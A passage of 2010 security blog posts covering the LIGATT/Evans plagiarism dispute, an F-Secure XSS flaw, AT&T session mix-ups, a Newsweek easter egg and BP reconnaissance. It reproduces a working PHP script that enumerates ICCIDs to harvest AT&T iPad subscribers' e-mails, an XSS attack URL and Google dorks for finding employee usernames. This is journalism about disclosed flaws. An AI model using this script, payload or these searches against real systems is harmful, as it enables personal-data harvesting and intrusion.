Is having these types of flaws on an information security site the end of the world? We just wrote a story about F-Secure having something similar on their US site last week. The difference: F-Secure corrected the issue, and wrote a post describing the problem, within twenty four hours of notification. Web site injection flaws are common, security companies will have them from time to time, and the key to deriving meaning from such stories is evaluating how the security firm responds.

Finally

Edmund Burke once said, “All that is necessary for evil to triumph is for good men to do nothing.”

Related Content

• Gregory D. Evans, Even More Plagiarism

Related Posts:

• Asian Men Prefer LIGATT
• LIGATT’s Evans Strikes Back
• Did LIGATT Security’s CEO Threaten the Life of a Security Professional?
• A Loss of SecurityFocus

Gregory Evans, the CEO of LIGATT Security, is not taking the criticism heaped upon himself and his firm or his latest book lying down. Yesterday he posted a pair of videos on “National Cyber Security”, a web site under the LIGATT umbrella, as part of an article written by a “Seria Mullen”, News Researcher at LIGATT Security in which he puts forth that security professionals Chris John Riley and Ben Rothke are motivated by racism.

Seria Mullen?

Let’s start with the article’s author. Geoff Belknap’s research points out quickly that the Seria Mullen who wrote this less than eloquent article bears a striking resemblance to (actual person) Knox News reporter Chloe White Kennedy.

You decide:

Article on Computer Nerds by Seria Mullen.

Knox Reporter Chloe Kennedy?

Separated at birth perhaps?

News Stories?

It doesn’t take a brain surgeon to figure out that what are being presented as original articles by the mysterious doppelganger Ms. Mullen are just lifted directly from other places:

Homeland Security Newswire Story.

Story on LIGATT's National Cybersecurity.

Video – Part 1

On to the two videos: http://www.nationalcybersecurity.com/articles/441/1/How-Can-Computer-Nerds-Be-Racist/Page1.html.

Evans starts by going after security professionals Ben Rothke, who performed a careful analysis of the plagiarized material in “How to Become the World’s Number 1 Hacker”, and Chris Riley who played a part in a fairly respectful interview of Evans on a podcast released yesterday, and whom Evans threatened harm to for some reason, potentially identity confusion.

For some reason he drones on about Kevin Mitnick, and suggests that the current security industry worships the work Mitnick did. He suggests in the video that Kevin Mitnick came to him for advice on the deal being offered him by the government while the two were incarcerated together.

This was quickly refuted by Mitnick himself:

Pretty unambiguous.

At 11 minutes in he has still not referenced the plagiarism, ostensibly the reason for making the video response. The next minute is spent discussing how much money he made and help he states having given to the community.

Video – Part 2

Evans finally decides to address the plagiarism issue in part two, wait, no he’s not.

Minute one walks through the media companies he has bamboozled into putting him on television. For some reason he equates his exposure to what he appears to put forth as a “right” to plagiarize the material of people he feels are less well known. He proceeds to discuss contracts held with two professional sports franchises, the Atlanta Hawks and Atlanta Thrashers; however, the contract shown appears to be with Arena Sports Marketing, LLC. The Chief Sales Officer of Atlanta Spirit LLC (parent company of the Thrashers) asserts that LIGATT has never provided “services for the Hawks, Thrashers, or Philips Arena”.

E-mails Regarding the Sports Teams

Ben Rothke took the time to verify his findings on this claim with representatives of the two sports teams:

From: Ben Rothke
To: White, Tracy; Penningroth, Ailey
Sent: Sun Jun 13 10:14:13 2010
Subject: Is LIGATT Security in fact the official cyber security provider of the Atlanta Hawks?

Greetings,

I wrote a book review of *How To Become The Worlds No. 1 Hacker* -

https://365.rsaconference.com/blogs/securityreading/2010/06/10/how-to-become-the-worlds-no-1-hacker.

The book is nearly a complete work of plagiarism.

In the book, the author states that LIGATT is the official cyber security
provider of the Atlanta Hawks. I attached an excerpt of the book which
highlights that.

Note that the also says he is the official cyber security provider of
Phillips Arena and the Atlanta Thrashers.

Can you tell me if that claim is correct?

Thanks,

Ben

To which he received the following replies:

On Sun, Jun 13, 2010 at 10:39 AM, White, Tracy <
Tracy.White@atlantaspirit.com> wrote:

That claim is not accurate. We are aware that he has made these statements
but they are not accurate.

From: White, Tracy 
Date: Sun, Jun 13, 2010 at 11:32 AM
Subject: Re: Is LIGATT Security in fact the official cyber security provider of the Atlanta Hawks?
To: Ben Rothke
Cc: "Penningroth, Ailey", "Wilkinson, Scott" 

Ben - yes, you're correct....Ligatt doesn't provide (nor have they ever
provided) services for the Hawks, Thrashers or Philips Arena.

Partial cut of a contract provided by Evans references a marketing company, not the teams.

Continuing…

I passed out until 4:26, but there was a lot of bragging about something.

He discusses his twitter program, Learn to Hack in 15 Minutes, for which he issued a press release on May 5th. The video cuts out, and then comes back to his discussion of a teacher teaching from a text book that the teacher didn’t write. In the podcast yesterday he references the fact that a preacher will read from the Bible, but did not actually write the Bible. His overall stance appears to be that he never said he would be writing his own content as opposed to taking content from other people and therefore copying the content verbatim in his social media campaign is therefore okay. He is “taking a little here” and combining it for laypeople, which according to him is why he makes one million plus a year.

He goes on to explain that the books are not written for a security audience with various metaphors. He discusses that Chris John Riley is a joke to him (again no one is sure why or the basis for his animosity). The video cuts in and out in this part where obvious edits have been made. He insults education, and calls his audience computer nerds. He makes some references to celebrities.

We are now at 19 minutes and the plagiarism charges, the reported reason for the videos, have not been addressed.

He goes on to reference Jobs, Gates, and Dell as people who, like himself, understand both the business “and computers”.

At 11:49 in video two the discussion of plagiarism finally begins: “I wrote 60% of my book.” The analysis does not support this, there are a number of chapters with 90% similarity rates to previously published work per the iThenticate tool analysis run by Rothke. Evans stated he put out a call for “ghost writers” to which he received “stacks and stacks of information”. He states that the actual authors of the work accepted a flat fee in exchange for signing away full rights to the created work, signing a release and confidentiality agreement. He claims the “people who wrote the stuff” aren’t calling him, or “posting to your board” that their authored works were taken. His claim is that they are not doing this because they signed both a release and a confidentiality agreement. The video cuts out at 13:47 while he is still talking.

Refuting the Paid Authorship Claim

This is done fairly quickly via an example. Below find a page from the book How To Become The Worlds No. 1 Hacker:

Page from #1 Hacker Book.

Now let’s look at a section of the article MS Terminal Server Cracking on ethicalhacker.net:

Article on ethicalhacker.net.

Notice any similarities? Right down to forgetting to remove the name chrisgates on the command prompt, they’re the same.

So its a straight copy, but maybe Chris Gates was paid as Greg suggested, and elected to “sign a release”. Again, easily checked:

Where's my money?

Maybe the check is in the mail?

Finally

This many acts of taking another person’s work without attribution would not have made it past most publishing houses. But with that said, I can’t find another book that’s been published by “Cyber Crime Media”. This mostly nonsense, ham-fisted defense of his actions is amusing on some levels, although probably not for the two real security professionals he is lobbing unsupported accusations at.

Anyhow, we’re sick of the chicanery.

We know, two posts now on the LIGATT story line. It’s like a car accident we can’t look away from. We’ll promise to get back on something more important soon.

References

• Gregory D. Evans Criminal History
• Fair use, plagiarism and the World’s No. 1 Hacker book
• LIGATT honestly and truly scares me
• LIGATT, a Cautionary Tale of Cybersecurity Snake Oil

Related Posts:

• Asian Men Prefer LIGATT
• NationalCyberSecurity.com has all “Original Content”
• Did LIGATT Security’s CEO Threaten the Life of a Security Professional?
• A Loss of SecurityFocus

European security analyst Chris John Riley is a well known and legitimate security professional who co-hosts the Eurotrash Security Podcast and writes on the Catch22 Insecurity blog. Gregory Evans is a convicted felon (federal conspiracy and wire fraud against AT&T and MCI for stealing 125 toll free telephone lines) who paid $9 million in restitution, was sentenced to 24 months in federal prison, and runs a dubious company that makes great commercials but also claims a client list they don’t actually have, plagiarizes to write books, and performs press release ping pong with a penny stock. So how did one of these men come to threaten the lives of the other and his family?

The Buildup, The Book

Book/plagiarism.

As mentioned, Riley is part of the Eurotrash Security Podcast, and as with many podcasts, interviews of information security professionals and personalities come with the territory. In that role, Riley sought to have Evans do an interview on the most recent charges that his book How To Become The Worlds No. 1 Hacker is largely a work of plagiarism.

So Riley called the LIGATT office in Atlanta, was eventually put through to Evans, and after discussing some preliminaries on the book agreed to an interview the following evening. Riley provided his blog URL and LIGATT’s secretary provided Evan’s Skype ID (ligattsecurity) for the interview.

15 Minutes Later…

Within fifteen minutes of the phone call, the following comment was submitted to the book review section of Riley’s blog:

Comment received 15 minutes after phone call.

So what would cause the CEO of a publicly traded company to fly off the handle in such an unreasonable way? The answer may be a case of mistaken identity. The 20Plus reference in the beginning of Evan’s written rant makes no sense when applied to Chris John Riley. But there is a user on the forums of advfn.com, an investment web site, with that handle. And this is a user who continually expresses dissatisfaction with the LIGATT stock (LGTT) and the management of the company.

Maybe Its Not Evans

We can allow for that possibility, but a preponderance of evidence shows otherwise. The whois for the IP address shows BellSouth, Atlanta GA, right where the LIGATT offices are. That combined with the specific references to the phone call and references to an Evan’s nemesis on investment boards of ADVFN suggest this was in fact Evans.

IP points to Atlanta, GA

Put up the money and challenge me!

One of the lines in the comment references Mr. Evans’ repeated call to “challenge him” to some manner of hacker competition.

LIGATT, ostensibly Evans, challenges the hackers of the world.

A credible response to this challenge was made by Chris Nickerson, formerly of Tiger Team fame (a TruTV show demonstrating actual social engineering and hacking).

Nickerson's unambiguous response.

Thus far Evans continues to repeat the original challenge, while refusing to acknowledge that Mr. Nickerson has already accepted it.

Finally

This nonsense with Evans and this company has been far too much for far too long. It is a free country, and people can form firms and make a living, even reformed criminals. But the evidence suggests, as it has for a while, to steer clear of Ligatt and its volatile CEO. Far too many, especially in the media (Fox News, CNN, The History Channel), have been taken in by the wild claims of this outfit.

Update

The Student Hacker IT cast has posted their LIGATT Interview, which is fairly instructive of the issues discussed.

Related Posts:

• Asian Men Prefer LIGATT
• NationalCyberSecurity.com has all “Original Content”
• LIGATT’s Evans Strikes Back
• A Loss of SecurityFocus

In a new section supporting the release of an anti-theft product for mobile phones, the web site of Helsinki based anti-virus company F-Secure is vulnerable to cross site scripting (XSS).

XSS String

A hidden form field reflects values from a name value pair (hidManufacturer in this case) from the URL.

Attack URL:

http://www.f-secure.com/en_EMEA/products/mobile/anti-theft-download/anti-theft-download-
wizard.html?hidManufacturer=%27%22%3E%3C/title%3E%3Cscript%3Ealert%28/Mikko%20rulz/%29%3C
/script%3E

First reflection of URL XSS name-value pair:

<input type="hidden" name="hidManufacturer" id="hidManufacturer" value="\'\&quot;&gt;&lt;\/title&gt;&lt;
script&gt;alert(\/Mikko rulz\/)&lt;\/script&gt;"/></p>

But nothing happens on this reflection because much of what is passed in the URL (the bracket and quote characters) is encoded as &quote, &gt, &lt on the output of the page. This is generally recognized as a right practice to avoid many forms of cross site scripting attacks on web pages.

Unfortunately a Javascript later in the page is referencing the passed in string without any of the same encoding.

Second reflection in the page of the same value:

<script type="text/javascript">
    document.getElementById(''"></title><script>alert(/Mikko rulz/)</script>').setAttribute("class", 
"selected");
    document.getElementById(''"></title><script>alert(/Mikko rulz/)</script>').setAttribute("className", 
"selected");
</script>

A Javascript reflects values unencoded from a name value pair in the URL.

Finally

The Mikko reference is to Mikko Hypponen, the well known Chief Research Officer at F-Secure. The defect was submitted to XSSED by Xylitol. At a glance this appears to be the first new web site specific problem with the main F-Secure web site (country specific versions have had issues) since the F-Secure forum defacement in 2007.

Reflected cross site scripting attacks are on the low end of the scale when it comes to web application vulnerabilities, however they can be used effectively in phishing style attacks (ex: here is a URL to F-Secure, but I will attempt to steal a user session, redirect the user, serve them malware, etc. based on being able to execute a script as the F-Secure web site). As always it behooves a security company to correct problems like this fairly quickly, and F-Secure clearly knows what to do already since they’re using output encoding in one part of the page already.

Update 06/8/2010

The problem was corrected quickly, and the issue explained competently by Mikko, as expected.

Related Posts:

• Formspring.me XSS Vulnerability
• XSS Flaw on PayPal.com
• Pentagon Web Site Vulnerabilities Identified

Users are reporting issues trying to reserve the ability to purchase (pre-order) the latest iPhone 4 on June 24th, when they go on sale, caused by what is basically a complete overwhelming of the systems designed to take the orders. AT&T’s web interface at brick and mortar shops is failing to the point where orders are being taken with pen and paper, and the Apple web site is acting clunky. But the most serious issue people are reporting is that upon logging into AT&T online to place the order, another user’s information is coming up.

AT&T eventually just disabled online access for its users. Gizmodo received these messages from their readership amongst around 8 complaints:

From: Eric Paul Mertens
Date: Tue, Jun 15, 2010 at 11:19 AM
Subject: AT&T iphone pre-order wrong account

This morning while trying to pre-order the iPhone 4 through AT&T website, my login brought me to a ‘website 
unavailable' screen. After a refresh it brought me to the phone upgrade page logged in under a different 
account, 

some dude from Lakewood OH!

From: Michael
Date: Tue, Jun 15, 2010 at 11:09 AM
Subject: AT&T security breach

Hello,

I am not sure if this e-mail is going to the correct place but this morning when trying to log in to my at&t 
account I entered my information and ended up in someone else's account with access to all their information. 
I feel as though someone could now be logged in to my account. To me, this seems like a huge security 
breach and at&t is shrugging me off as if it is no big deal and I feel that it is. I just thought with the
recent i-pad breach that this one is an even bigger one and I wanted to bring it to your attention.

Thanks,
Michael Staropoli

And one user was kind enough to provide a screenshot to drive home the point.

From: john king
Date: Tue, Jun 15, 2010 at 2:04 PM
Subject: ATT WEBSITE LOGS ME IN AS ANOTHER CUSTOMER
To: tips@gizmodo.com

I LOGGED IN AS ME AND IT BROUGHT UP A MARY ???? BIG PROBLEM
-JPK

AT&T user finds that he's a Mary.

System Upgrade?

Gizmodo received a report from a 3rd party put forth that an untested (in their opinion) system change is probably responsible for these issues.

I work at a 3rd party order processing facility—what AT&T refers to as a 3CC. We process business-to-business, business-to-customer Wireline Indirect, and ACME/PAC (what AT&T calls their iPhone program internally). Agents use AT&T programs called Phoenix, Telegence, Compass, Ordertrack and myCSP to process orders.

You might want to advise people to not get the upgrade at this point as it may be a doorway to a major privacy breach.

This analysis is thin and speculative at best. It seems to be focused on B2B platforms, whereas the problems are reported in the retail web site. It is possible to have a problem introduced this way, but theoretically it would probably be more wide spread.

Nah…

So if we look at this, without any other information, how do we decide that one user logging in and seeing another user’s information is probably not the result of a weekend systems’ upgrade? Because we’ve seen this behavior before, a lot. When you stress test a web site, its not uncommon to see functions that return and read user sessions get garbled, and web sites start to return pages for the wrong user session.

U.S. productivity grinds to a stand still.

When you log into a web site a session gets created and some sort of persistence mechanism is returned to maintain the session (usually a session cookie, but there are other less used methods available). Every “logged in page” reads this session identifier to determine whether the user is logged in and uses it to return the right information. Further complexity is usually introduced into large web sites, where some sort of load balancing is taking place, and therefore a user’s session has to be found amongst data centers, servers, and so forth.

As Christian points out below, one example is that session cookies are sometimes made unique based on a time stamp which in many sites will only go down to milliseconds. Thus when a site receives too many concurrent requests, it starts issuing duplicate session cookies.

When you overload the capacity of programs that read, manage, and create sessions, bad stuff happens like sessions getting crossed. Since the AT&T site was probably under a severe and unusually high server load today, the site went haywire (in our technical opinion).

How do you prevent this from happening? Add occasional and event driven stress testing to your quality assurance processes, you will find a number of unusual and difficult to solve problems result. At the very least you will know how your web application acts under unusually high loads, and thus not be surprised when the Apple fanboys come calling for Steve’s latest masterpiece.

Related Posts:

• May’s Patch Tuesday
• March’s Patch Tuesday
• Press F1 for Help, pwned.
• First Patch Tuesday of 2010
• Regular or Decaf? Tool launched to combat COFEE

Newsweek.com becomes the latest in a long list of sites that will reveal an Easter egg if you enter the Konami Code (↑, ↑, ↓, ↓, ←, →, ←, →, B, A, enter) correctly. The Konami Code is a cheat code that appeared in many of Konami’s video games, starting in around 1986 (my favorite places to use it were Contra and Life Force, 30 lives FTW). Ostensibly this is probably something that was included by a developer unbeknownst to the powers that be at Newsweek, similar to an incident that happened at ESPN involving unicorns last year.

Enter Konami code, be warned of Zombie attack.

Buried in a file of other Javascript libraries used by the Newsweek site is the Konami Javascript library code written by George Mandis. Within http://www.newsweek.com/etc/designs/newsweek/lib.js is the following Javascript, which looks for the keyboard pattern (↑, ↑, ↓, ↓, ←, →, ←, →, B, A, enter) and replaces content on the page when successful as shown:

/*
    * Konami-JS ~
    * Modified variable names and obscured (March 31st, 2010), but otherwise intact
    * :: Now with support for touch events and multiple instances for 
    * :: situations that call for multiple easter eggs!
    * Code: http://konami-js.googlecode.com/
    * Examples: http://www.snaptortoise.com/konami-js
    * Copyright (c) 2009 George Mandis (georgemandis.com, snaptortoise.com)
    * Version: 1.2 (1/30/2010)
    * Licensed under the GNU General Public License v3
    * http://www.gnu.org/copyleft/gpl.html
    * Tested in: Safari 4, Firefox 3, IE7 and Mobile Safari 2.2.1
*/

var AdDebug = function() {
    var adDebug= {
            addEvent:function ( obj, type, fn, ref_obj )
            {
                if (obj.addEventListener)
                    obj.addEventListener( type, fn, false );
                else if (obj.attachEvent)
                {
                    // IE
                    obj["e"+type+fn] = fn;
                    obj[type+fn] = function() { obj["e"+type+fn]( window.event,ref_obj ); }

                    obj.attachEvent( "on"+type, obj[type+fn] );
                }
            },
            input:"",
            pattern:"3838404037393739666513",
            load: function(link) {  

                this.addEvent(document,"keydown", function(e,ref_obj) {                                         
                    if (ref_obj) adDebug = ref_obj; // IE
                    adDebug.input+= e ? e.keyCode : event.keyCode;
                if (adDebug.input.indexOf(adDebug.pattern) != -1) {
                    adDebug.code(link);
                    adDebug.input="";
                    return;
                    }
                },this);
            this.iphone.load(link)

                },
            code: function(link) { window.location=link},
            iphone:{
                    start_x:0,
                    start_y:0,
                    stop_x:0,
                    stop_y:0,
                    tap:false,
                    capture:false,
                    keys:["UP","UP","DOWN","DOWN","LEFT","RIGHT","LEFT","RIGHT","TAP","TAP","TAP"],
                    code: function(link) { window.location=link},
                    load: function(link){
                            adDebug.addEvent(document,"touchmove",function(e){
                              if(e.touches.length == 1 && adDebug.iphone.capture==true){ 
                                var touch = e.touches[0]; 
                                    adDebug.iphone.stop_x = touch.pageX;
                                    adDebug.iphone.stop_y = touch.pageY;
                                    adDebug.iphone.tap = false; 
                                    adDebug.iphone.capture=false;
                                    adDebug.iphone.check_direction();
                                    }
                                    });               
                            adDebug.addEvent(document,"touchend",function(evt){
                                    if (adDebug.iphone.tap==true) adDebug.iphone.check_direction();           
                                    },false);
                            adDebug.addEvent(document,"touchstart", function(evt){
                                    adDebug.iphone.start_x = evt.changedTouches[0].pageX
                                    adDebug.iphone.start_y = evt.changedTouches[0].pageY
                                    adDebug.iphone.tap = true
                                    adDebug.iphone.capture = true
                                    });               
                                    },
                    check_direction: function(){
                            x_magnitude = Math.abs(this.start_x-this.stop_x)
                            y_magnitude = Math.abs(this.start_y-this.stop_y)
                            x = ((this.start_x-this.stop_x) < 0) ? "RIGHT" : "LEFT";
                            y = ((this.start_y-this.stop_y) < 0) ? "DOWN" : "UP";
                            result = (x_magnitude > y_magnitude) ? x : y;
                            result = (this.tap==true) ? "TAP" : result;                     
                            if (result==this.keys[0]) this.keys = this.keys.slice(1,this.keys.length)
                            if (this.keys.length==0) this.code(this.link)
                            }
                    }
    }

    return adDebug;
}

var adDebugContent = function(){
    function render() {
        $("a").attr("href", "#");

        // FEATURE
        var feature = '<article class="feature-area feature-style-wide"><div class="feature-content"><header><span class="byline" property="dc:creator">MIKE ROBINSON</span><h1 class="header header-60"><a href="#">ZOMBIES ATTACK!</a></h1><span class="subhead">Run for the hills!</span></header><p>The undead have risen from their graves and invaded large portions of the east coast. Driven only by an unsatiable desire for brains, there seems to be no stopping their ruthless push forward. Residents are advised to barricade themselves in their homes and wait for further instructions. Under no circumstances should the walking dead be allowed in your house.</p></div>'
        $(".feature").html(feature);

        // NEWSWEEK NOW
        $(".newsweek-now .par").html("");
        var nowHtml = "";
        var nowTemplate = '<div class="newsweeknow section"><article class="stream-item" class="stream-item article-item"><h2 class="header" property="dc:title"><a href="#">${title}</a></h2><div class="grid-5"><p class="text" property="dc:abstract">${description}<a rel="dcterm:source" href="#" class="more">More <span class="guillemets">&rsaquo;</span></a></p></div><aside class="grid-2 last"><a href="/search.html?q=tea+party" class="primary-tag" title="Primary Tag" property="dc:subject ctag:label foaf:primaryTopic" typeof="ctag:Tag" resource="/content/newsweek/tag/politics.html" rel="ctag:means">Zombies</a><span class="byline">by <span class="author"><a typeof="foaf:person" property="dc:creator" rel="foaf:publications">${author}</a></span></span><time property="dc:created" pubdate="true" datetime="2010-06-11">Jun 11, 2010</time></aside></article></div>';

        for(var i = 0; i < content.now.length; i++){
            var template = nowTemplate;
            var item = content.now[i];

            template = template.replace("${title}", item.title);
            template = template.replace("${description}", item.description);
            template = template.replace("${author}", item.author);

            nowHtml += template;
        }
        $(".newsweek-now .par").html(nowHtml);

        // SPECTRUM
        $(".spectrum h2").html(content.spectrum.title);
        $(".spectrum a").attr("href", "#");
        var spectrumItems = $(".spectrum ul.sidebar-content li");
        var j = 0;
        for(var i = 0; i < spectrumItems.length; i++){
            var element = spectrumItems[i];

            if(j < content.spectrum.viewpoints.length){
                var item = content.spectrum.viewpoints[j];

                $(element).find("h3 a").text(item.title);
                $(element).find("q a").html(item.quote);
                $(element).find("span.source").text(item.source);
                $(element).find("cite.publication").hide();
                j++;
            } else {
                $(".spectrum ul.sidebar-content li").eq(i).remove();
            }
        }
    }

    var content = {
        "now":[
            {
                "title":"The Zombie Invasion Timeline",
                "description":"It was just three months ago that patient zero, a former British citizen living in New York, was identified as the cause of the zombie invasion. While initially considered to be a bad sinus infection, the disease quickly spread after Patient Zero ate the brains of a attending neurosurgeon.",
                "author":"Steven Stone"
            },
            {
                "title":"Fleeing the Zombie Horde: What Are Our Options?",
                "description":"With goverment barricades falling and traditional warfare tactics deemed ineffective, the local populace must now consider the option of fleeing as viable and advised. There are many options depending on an individuals geographical location, however most zombie experts expressly advise against running for the hills without proper preparation. One must take into consideration the hazardous effects natural elements such as rain and cold weather can have, especially in cold winter months.",
                "author":"Dan Alcalde"

            },
            {
                "title":"No End in Sight for Undead Feast",
                "description":"The haunted continue to walk the streets, often heard moaning 'BRAAAAAIIIIIINS!' [paraphrased]. With their unstoppable quest for human brains the undead have shown no signs in slowing down their pursuit or consumption of our most precious organs. A noted chef suggests, 'While zombies will eat any organ, they most definitely have a preference for our soft cranial tissue. It is easily digestible, and once the tough outer skull is removed quite simple to recover.'",
                "author":"Roberto Gonzalez"
            },
            {
                "title":"Go For the Head",
                "description":"Several close combat experts have reiterated how important it is to strike a zombie directly in the head with a large blunt weapon. Only by smashing their brains can you be certain the approaching undead will not rise again and feast on your exposed limbs.",
                "author":"Nicole Barth"
            },
            {
                "title":"Zombies and You",
                "description":"Not everybody reacts the same to the undead. If you, or a loved one, has encountered a zombie please share your experiences in the comments.",
                "author":"Monica Parra"
            }

        ],
        "spectrum":{
            "title":"Zombie Invasion Continues Unabated",
            "viewpoints":[
                {
                    "title":"SUSPICIOUS",
                    "quote":"I don't see how every barricade could fail unless the government meant to let them through.",
                    "source":"Tim Knight"
                },
                {
                    "title":"DECISIVE",
                    "quote":"If we can't be protected then we'll just protect ourselves!",
                    "source":"Mike Robinson"
                },
                {
                    "title":"FLEEING",
                    "quote":"Save yourselves, run now",
                    "source":"Mark Catalano"
                },
                {
                    "title":"HUNGRY",
                    "quote":"Braaaaaains. Braains brains braaaaaaaaains...",
                    "source":"Dan Alcalde"
                },
                {
                    "title":"BITTEN",
                    "quote":"Wow those things bite hard. Oh, I feel funny...",
                    "source":"Andrew Sprouse"
                }
            ]
        }

    }

    return {
        render: render
    } 
}();

Finally

In the case where this happened on ESPN the results were mostly harmless. As explained by developer Keith Lam, the incident was a prank, not an indication that someone hacked into the site (the developer was canned though). It will be interesting to see if Newsweek’s amusing defacement is the same situation.

If so, the only downside to the ESPN unicorns was that it exposed that there is little control over the production environment at ESPN, it was fairly easily for a developer to sneak something into production without anyone knowing about it. Unicorns are funny, a disgruntled person could come up with things to show on the web site that aren’t so funny.

But in both cases, these are harmless jokes, so no harm no foul for the most part.

Update – 6/15/10

According to a Newsweek spokesperson it was an internal developer: “It’s true that our programmers had a bit of fun and hid the Konami Easter egg in the site. It does not affect the rest of the site’s functionality. Now that we’ve all had a laugh, we will be removing it.”

Related Posts:

• Going After BP
• Congressional Web Site Defacements Follow the State of the Union
• Umm…TechCrunch? Defacement Two in 24 Hours
• TechCrunched – TechCrunch the Victim of a Defacement
• Baidu.com the Latest Victim of Iranian CyberArmy

I feel better now.

Related Posts:

• Give this Man a Haircut and Support a Worthwhile Cause
• James Lipton says “Don’t tweet your junk”
• LoJack for children
• Yahoo! and the Objectification of Women

Here is the script referenced in the Gawker story from earlier that describes how a number of early iPad 3G subscribers, including names like Harvey Weinstein, Michael Bloomberg, Diane Sawyer, and Rahm Emanuel had their e-mails revealed via a poorly designed web application hosted by AT&T.

Goatse Security, named for the famous Internet shock image, wrote the script to harvest e-mail addresses by providing ICC-ID numbers (integrated circuit card identifier, a number that associates a SIM card with a subscriber) and parsing the returned e-mail address.

High profile users from the list of harvested e-mail addresses.

After speaking with Goatse Security member Weev, he was kind enough to share the script:

<?php

// iPad 3G Account Slurper
//
// Usage: ./ipadump.php ICCID-base count
// (The script generates the final checkdigit to produce ICCIDs from the entered base)

$useragent="Mozilla/5.0 (iPad)"; //Spoof as iPad
$ICCIDroot = $_SERVER['argv'][1]; 
$ICCIDcount = $_SERVER['argv'][2];

function genluhn($number){ //Crappy home-made Luhn checkdigit generator
    $i = strlen($number)-1;
    do {
        $array[] = $number[$i];
        $i--;
    } while ($i > -1);
    $i = 0;
    foreach ($array as $digit) {
        if (!($i & 1)){
            $digit = $digit * 2;
            if ($digit >= 10) {
                $digit = $digit - 9;
            }
        }
        $total += $digit;
        $i++;
    }
$luhn = 10 - ($total % 10);
if ($luhn == 10) $luhn=0;
return $luhn;
}


while (1) { //Continue FOREVER

    $ch = curl_init(); //Set up cURL
    curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); //Since theres a lot of redirection
    curl_setopt($ch, CURLOPT_COOKIEJAR, "cookies"); //See later
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); //Returns any and all data
    $ICCID = $ICCIDroot.genluhn(strval($ICCIDroot)); //Generate checkdigit and attach it to 
the ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/openPage?ICCID=".strval($ICCID)."&IMEI=0");
    $output = curl_exec($ch); //Load first page with ICCID
    curl_setopt($ch, CURLOPT_URL, "https://dcp2.att.com/OEPClient/Customer");
    $output = curl_exec($ch); //Now load page that is normally redirected with JavaScript. 
cURL is nice and passes the previously GET'd info
    curl_close($ch); 
    //print $output; //Prints HTML result

    if (!($counter % 50)) echo "-".strval($ICCID)."-\n"; //Prints ICCID every 50 counts just 
to keep track of how far the script has gotten

    //Parse output. Terribly sloppy
    if (preg_match("/<title>Error<\/title>/", $output, $match)) {
        preg_match("/<div class=\"info-container\">(.*)<br>(.*)<br>/msU", $output, 
$match);
        $match[0] = preg_replace("/<div class=\"info-container\">\n\s\s+/","",$match[0]);
        $match[0] = preg_replace("/<\/b><br>/", "<\/b> <br>", $match[0]); //Because I 
want space between the period and the next sentence, dammit
        $errnum = strip_tags($match[0]);
        $status = "Error! ".$errnum; //Return specific error message
    } else if (preg_match("<input id=\"email\" name=\"email\" type=\"email\" 
placeholder=\"Required\" value=\".*\@.*\" autocapitalization=\"off\" autocorrect=\"off\">", 
$output, $match)) {
        $match[0] = preg_replace("/input id=\"email\" name=\"email\" type=\"email\" 
placeholder=\"Required\" value=\"/","",$match[0]);
        $status = preg_replace("/\" autocapitalization=\"off\" autocorrect=\"off\"/", "", 
$match[0]); //Return email address
    } else {
        $status = "Inactive"; //Assume SIM is inactive if nothing tells us otherwise. Bad 
logic, will fix.
    }

    if ($status != "Inactive") echo strval($ICCID)." : ".$status."\n"; //Print ICCID with error 
message or email address. Can print if ICCID is inactive, but it makes for a long, redundant log.
    if ($counter == $ICCIDcount) exit;
    $ICCIDroot++; //step ICCID
    $counter++; //step loop counter
}
?>

There are probably a few things worth pointing out. They had to set the user-agent string to be the iPad as shown:

$useragent="Mozilla/5.0 (iPad)";

The vulnerable URL at att.com was:

https://dcp2.att.com/OEPClient/openPage?ICCID=Insert number here&IMEI=0

And that’s it, an e-mail address gets returned in the successful iterations (active ICCID) and parsed. There’s no hack, no infiltration, and no breach, just a really poorly designed web application that returns e-mail address when ICCID is passed to it.

Related Posts:

• SHODAN: Cracking IP Surveillance DVR
• You’ve been SHODAN’d

BP continues to be the subject of criticism following the Deepwater Horizon oil spill, and the hacking community appears to be taking exception to some of BP’s recent public relations activities in the online arena. Specifically, reactions to BP’s having bought the sponsored link for the search term ‘oil spill’ seems to have triggered resentment in the form of both reconnaissance work, a Twitter account compromise, and an amusing cross site scripting vulnerability.

In the Reddit case, the method shown and gotchas demonstrated are worth covering, although no actual hack takes place. The XSS demonstrated at the bottom of the post is just creative and funny.

Twitter

As widely reported, on May 27th, BP’s official Twitter account was compromised and the following tweet put up.

Pick a stronger password.

And while it’s not a hack, the spoof Twitter account BPGlobalPR has garnered some attention (150k followers) as a satirical response to BP’s actual public relations response. It has gotten enough attention that the real BP has made overtures to the fake account to better identify itself as a parody.

Reddit

Last night on Reddit a user skipperdee responded to a post about the BP sponsored link as follows:

Reconnaissance

Let’s walk through his suggestions:

VPN Login Screen

Looking at what’s here, he found what is ostensibly a VPN login screen for some extranet type applications: https://access.bpglobal.com/bp/C/login.html?_targetURL=https://access.bpglobal.com/pkmslogin.form (with what looks like an open redirect).

Down tick one for information security is that it offers only certificate based authentication or alternatively login with a plain id and password.

https://access.bpglobal.com/help/bpcertExpired.html

A review of this screen (above) however seems to indicate that the user’s windows login (active directory) is the same as their IDAM login, by referencing the phrase NT ID and password.

User Names

Our Reddit user goes on to show off a little Google hacking by demonstrating how to find out the user names of BP employees:

http://www.google.com/#hl=en&q=%22Documents+And+Settings%22+site%3Abp.com&aq=f&aqi=&aql=&oq=&gs_rfai=&fp=dfdf66882bd03aae.

Username equals Warna3.

Because a number of BP employees use the built in MS Word footer option for file name and path, their user names have been exposed in publicly released documents. Now that a number of usernames can be enumerated, with a brute force password cracker its off to the races for an attacker.

Documents

He then goes on to demonstrate that publicly available sites have a sub-directory /STAGING which appears to show semi-public documents (releases to the press, investor releases, etc.).

http://www.google.com/#q=site:bp.com+inurl:staging+%222010%22&hl=en&start=0&sa=N&fp=dfdf66882bd03aae

It’s unclear that anything unusual is publicly exposed here. One document is marked official use only which shows the oil spill projections, however that’s a lot like saying something is under copyright but still releasable. Another is marked “Project Confidential” but it’s unclear if it left that classification when added to the /STAGING site.

Situation Map.

Like a lot of large companies, there’s probably more online than should be, but it doesn’t appear /STAGING has any special significance as an intranet type site. I will confess, this is my favorite document, the April 2008 company magazine:

BP Horizon: The Battle to Secure Company Data.

Some Passwords

